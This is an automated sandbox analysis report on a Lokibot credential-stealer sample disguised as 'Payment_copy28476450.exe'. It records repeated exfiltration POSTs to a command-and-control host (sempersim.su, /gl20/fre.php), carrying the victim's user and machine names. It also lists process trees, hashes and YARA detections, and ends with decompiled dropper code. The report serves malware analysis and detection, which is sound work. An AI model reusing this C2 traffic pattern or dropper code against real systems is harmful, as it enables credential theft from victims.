49	192.168.2.6	49750	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:57.329298019 CET	337	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:57.396533012 CET	338	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:55:59.104899883 CET	338	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:00 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49702	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:25.054965973 CET	16	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:25.119462013 CET	17	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:26.773719072 CET	106	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:28 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.6	49751	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:55:59.376338005 CET	339	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:55:59.436526060 CET	339	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:56:01.147372961 CET	339	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:02 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.6	49752	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:56:01.434634924 CET	340	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:56:01.491497040 CET	340	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:56:03.175717115 CET	341	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:05 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.6	49753	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:56:03.443037987 CET	342	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:56:03.500075102 CET	342	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:56:04.545300961 CET	342	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:07 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.6	49754	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:56:04.818902016 CET	343	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:56:04.882036924 CET	343	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:56:06.628427029 CET	344	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:08 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.6	49755	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:56:06.881876945 CET	344	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:56:06.938436031 CET	345	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:56:08.689068079 CET	345	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:56:10 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49705	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:27.228812933 CET	198	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:27.296644926 CET	198	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:28.634654999 CET	198	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:30 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49706	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:29.062048912 CET	199	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:29.125740051 CET	200	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:30.867233992 CET	200	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:32 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49707	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:31.276699066 CET	201	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:31.333655119 CET	201	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:33.040571928 CET	269	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:34 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49709	95.213.216.202	80	C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 19:54:33.518227100 CET	270	OUT	POST /gl20/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1131A910 Content-Length: 169 Connection: close
Nov 24, 2022 19:54:33.575079918 CET	270	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 31 00 36 00 34 00 37 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer016477DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 24, 2022 19:54:35.412652016 CET	270	IN	HTTP/1.0 404 Not Found Date: Thu, 24 Nov 2022 18:54:37 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Payment_copy28476450.exePID: 160, Parent PID: 3452

General

Target ID:	0
Start time:	19:54:02
Start date:	24/11/2022
Path:	C:\Users\user\Desktop\Payment_copy28476450.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Payment_copy28476450.exe
Imagebase:	0x400000
File size:	247655 bytes
MD5 hash:	70E90926399154C2708801A73CF53D99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wcycejenv.exePID: 588, Parent PID: 160

General

Target ID:	1
Start time:	19:54:03
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Temp\wcycejenv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d
Imagebase:	0x400000
File size:	340992 bytes
MD5 hash:	3182BEF520A1E9F52BE3755C25E4C3B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.259864404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 50%, ReversingLabs Detection: 23%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 584, Parent PID: 588

General

Target ID:	2
Start time:	19:54:03
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: wcycejenv.exePID: 5332, Parent PID: 588

General

Target ID:	3
Start time:	19:54:04
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Temp\wcycejenv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\wcycejenv.exe" C:\Users\user\AppData\Local\Temp\stvrrcrc.d
Imagebase:	0x400000
File size:	340992 bytes
MD5 hash:	3182BEF520A1E9F52BE3755C25E4C3B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.510358180.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Payment_copy28476450.exePID: 160, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.9%
Total number of Nodes:	1272
Total number of Limit Nodes:	22

Executed Functions

Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB(0x423780, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\engineer\\Desktop\\Payment_copy28476450.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\engineer\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108);
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f9c == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\engineer\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\engineer\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
